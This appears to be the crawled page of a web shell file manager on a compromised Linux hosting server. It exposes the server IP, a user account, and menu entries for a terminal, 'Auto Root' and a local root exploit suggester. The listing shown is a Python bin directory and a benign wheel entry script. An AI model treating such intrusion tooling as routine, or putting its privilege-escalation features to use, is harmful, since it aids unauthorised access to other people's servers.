Linux server1.dn-server.com 4.18.0-553.89.1.lve.el8.x86_64 #1 SMP Wed Dec 10 13:58:50 UTC 2025 x86_64
LiteSpeed
Server IP : 195.201.204.189 & Your IP : 216.73.216.198
Domains :
Cant Read [ /etc/named.conf ]
User : beriska1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
python38 /
bin /
Delete
Unzip
Name
Size
Permission
Date
Action
2to3
108
B
-rwxr-xr-x
2024-09-23 14:56
idle3
106
B
-rwxr-xr-x
2024-09-23 14:56
idle3.8
106
B
-rwxr-xr-x
2024-09-23 14:56
lswsgi
102.82
KB
-rwxr-xr-x
2021-02-24 19:04
msgfmt3.8.py
7.42
KB
-rwxr-xr-x
2024-09-07 00:11
msgfmt3.py
7.42
KB
-rwxr-xr-x
2024-09-07 00:11
pathfix.py
6.64
KB
-rwxr-xr-x
2024-09-07 00:11
pip
661
B
-rwxr-xr-x
2023-11-14 01:10
pip-3
661
B
-rwxr-xr-x
2023-11-14 01:10
pip-3.8
661
B
-rwxr-xr-x
2023-11-14 01:10
pip3
661
B
-rwxr-xr-x
2023-11-14 01:10
pip3.8
661
B
-rwxr-xr-x
2023-11-14 01:10
pydoc3
91
B
-rwxr-xr-x
2024-09-23 14:56
pydoc3.8
91
B
-rwxr-xr-x
2024-09-23 14:56
pygettext3.8.py
21.04
KB
-rwxr-xr-x
2024-09-07 00:11
pygettext3.py
21.04
KB
-rwxr-xr-x
2024-09-07 00:11
python3
7.57
KB
-rwxr-xr-x
2024-09-23 14:56
python3-config
171
B
-rwxr-xr-x
2024-09-23 14:56
python3-debug
7.57
KB
-rwxr-xr-x
2024-09-23 14:56
python3.8
7.57
KB
-rwxr-xr-x
2024-09-23 14:56
python3.8-config
171
B
-rwxr-xr-x
2024-09-23 14:56
python3.8-x86_64-config
3.42
KB
-rwxr-xr-x
2024-09-23 14:49
python3.8d
7.57
KB
-rwxr-xr-x
2024-09-23 14:56
python3.8d-config
173
B
-rwxr-xr-x
2024-09-23 14:55
python3.8d-x86_64-config
3.41
KB
-rwxr-xr-x
2024-09-23 14:47
wheel
964
B
-rwxr-xr-x
2024-03-07 11:15
wheel-3
964
B
-rwxr-xr-x
2024-03-07 11:15
wheel-3.8
964
B
-rwxr-xr-x
2024-03-07 11:15
Save
Rename
#!/opt/alt/python38/bin/python3 # EASY-INSTALL-ENTRY-SCRIPT: 'wheel==0.37.1','console_scripts','wheel' import re import sys # for compatibility with easy_install; see #2198 __requires__ = 'wheel==0.37.1' try: from importlib.metadata import distribution except ImportError: try: from importlib_metadata import distribution except ImportError: from pkg_resources import load_entry_point def importlib_load_entry_point(spec, group, name): dist_name, _, _ = spec.partition('==') matches = ( entry_point for entry_point in distribution(dist_name).entry_points if entry_point.group == group and entry_point.name == name ) return next(matches).load() globals().setdefault('load_entry_point', importlib_load_entry_point) if __name__ == '__main__': sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0]) sys.exit(load_entry_point('wheel==0.37.1', 'console_scripts', 'wheel')())